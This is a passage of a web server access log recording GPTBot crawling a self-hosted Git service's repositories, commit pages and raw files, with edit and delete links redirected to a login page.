Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 13924903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14054] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:17:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11567] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode" -[17/Feb/2026:17:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:17:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:17:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9528] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 6593] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 9893] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:17:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10709] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 13858] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:17:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:17:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 13818742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13502] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 13827] [Gzip 6.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" -[17/Feb/2026:17:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13495] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 13818742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 6593] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" -[17/Feb/2026:17:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:17:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 11069] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" -[17/Feb/2026:17:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14741] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py?display=source" [Client 74.7.227.38] [Length 17793] [Gzip 5.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:17:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13406] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services" -[17/Feb/2026:17:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2f.vscode%2fc_cpp_properties.json" [Client 74.7.227.38] [Length 25356] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 17003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html?display=source" [Client 74.7.227.38] [Length 34405] [Gzip 9.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:17:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" -[17/Feb/2026:17:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:17:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:17:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:17:18:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" -[17/Feb/2026:17:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/BatchControl.png" -[17/Feb/2026:17:18:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" -[17/Feb/2026:17:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/BatchControl.png" -[17/Feb/2026:17:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:17:18:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:18:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" -[17/Feb/2026:17:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 873] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 